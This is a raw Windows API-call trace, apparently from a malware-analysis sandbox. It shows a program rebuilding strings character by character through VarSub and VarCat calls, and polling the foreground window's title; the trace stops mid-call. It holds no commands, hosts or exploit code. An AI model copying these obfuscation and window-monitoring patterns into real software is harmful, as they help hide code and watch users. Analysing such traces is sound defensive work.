[0181.958] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.006] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.006] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.007] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0182.007] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.007] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.007] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.008] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0182.008] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.008] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.008] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.008] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0182.009] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.009] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.009] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.009] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0182.010] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.010] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.010] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.010] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0182.010] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.011] GetForegroundWindow () returned 0x20086 [0182.011] GetLastError () returned 0x0 [0182.011] SysStringLen (param_1=" ") returned 0xff [0182.011] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0182.011] SysStringLen (param_1=" ") returned 0xff [0182.011] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0x11644c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0182.011] GetWindowTextA (in: hWnd=0x20086, lpString=0x11644c4, nMaxCount=255 | out: lpString="Program Manager") returned 15 [0182.011] GetLastError () returned 0x0 [0182.012] SysStringByteLen (bstr="牐杯慲慍慮敧r††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0182.012] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Program Manager", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0182.012] SysStringByteLen (bstr="牐杯慲慍慮敧r††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0182.012] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Program Manager", cbMultiByte=256, lpWideCharStr=0x114bcc4, cchWideChar=511 | out: lpWideCharStr="Program Manager") returned 256 [0182.012] SysStringLen (param_1="Progr") returned 0x5 [0182.012] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Progr", cchWideChar=6, lpMultiByteStr=0x116854c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Progr", lpUsedDefaultChar=0x0) returned 6 [0182.013] SetWindowTextA (hWnd=0x103c4, lpString="Progr") returned 1 [0182.013] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0xf [0182.013] GetFocus () returned 0x0 [0182.013] lstrlenA (lpString="Progr") returned 5 [0182.013] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xc, wParam=0x0, lParam=0x116854c) returned 0x1 [0182.014] IsWindow (hWnd=0x103c4) returned 1 [0182.014] IsWindow (hWnd=0x103c4) returned 1 [0182.014] IsWindow (hWnd=0x103c4) returned 1 [0182.014] IsWindow (hWnd=0x103c4) returned 1 [0182.014] GetFocus () returned 0x0 [0182.015] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x5 [0182.015] GetFocus () returned 0x0 [0182.015] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x6) returned 0x10ebcd0 [0182.015] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x6, lParam=0x10ebcd0) returned 0x5 [0182.015] GetFocus () returned 0x0 [0182.015] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Progr", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0182.015] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Progr", cbMultiByte=-1, lpWideCharStr=0x116854c, cchWideChar=6 | out: lpWideCharStr="Progr") returned 6 [0182.015] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0182.016] VarCmp (pvarLeft=0x28f190, pvarRight=0x28f1f8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0182.017] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="_", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="_\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.017] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.017] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="R", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="R") returned 1 [0182.017] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.017] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.018] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.018] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0182.018] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.018] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="t", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="t\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.018] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.019] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="g", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="g") returned 1 [0182.019] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.019] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.020] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.020] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0182.020] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.020] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.020] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.020] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0182.021] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.021] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.022] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.022] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0182.022] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.022] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.023] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.023] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0182.023] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.023] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.023] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.024] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0182.024] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.024] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.024] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.024] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0182.025] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.025] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.025] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.025] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0182.026] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.026] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.026] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.026] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0182.027] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.027] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.027] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.027] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0182.027] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.028] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.028] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.028] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0182.028] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.029] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.029] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.029] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0182.029] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.030] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.030] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.030] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0182.030] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.031] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.031] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.031] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0182.031] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.032] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.032] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.032] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0182.032] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.033] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.033] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.033] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0182.033] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.034] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.034] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.034] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0182.034] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.035] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.035] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.035] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0182.035] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.035] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.036] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.036] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0182.036] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.037] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.037] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.037] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0182.037] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.038] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.038] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.038] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0182.038] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.038] GetForegroundWindow () returned 0x1011a [0182.039] GetLastError () returned 0x0 [0182.039] SysStringLen (param_1=" ") returned 0xff [0182.039] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0182.039] SysStringLen (param_1=" ") returned 0xff [0182.039] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0x11644c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0182.039] GetWindowTextA (in: hWnd=0x1011a, lpString=0x11644c4, nMaxCount=255 | out: lpString="FolderView") returned 10 [0182.039] GetLastError () returned 0x0 [0182.040] SysStringByteLen (bstr="潆摬牥楖睥 ††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0182.040] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="FolderView", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0182.040] SysStringByteLen (bstr="潆摬牥楖睥 ††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0182.040] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="FolderView", cbMultiByte=256, lpWideCharStr=0x114bcc4, cchWideChar=511 | out: lpWideCharStr="FolderView") returned 256 [0182.040] SysStringLen (param_1="Fol") returned 0x3 [0182.040] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Fol", cchWideChar=4, lpMultiByteStr=0x1150ca4, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Fol", lpUsedDefaultChar=0x0) returned 4 [0182.041] SetWindowTextA (hWnd=0x103c4, lpString="Fol") returned 1 [0182.041] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x5 [0182.041] GetFocus () returned 0x0 [0182.041] lstrlenA (lpString="Fol") returned 3 [0182.041] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xc, wParam=0x0, lParam=0x1150ca4) returned 0x1 [0182.041] IsWindow (hWnd=0x103c4) returned 1 [0182.042] IsWindow (hWnd=0x103c4) returned 1 [0182.042] IsWindow 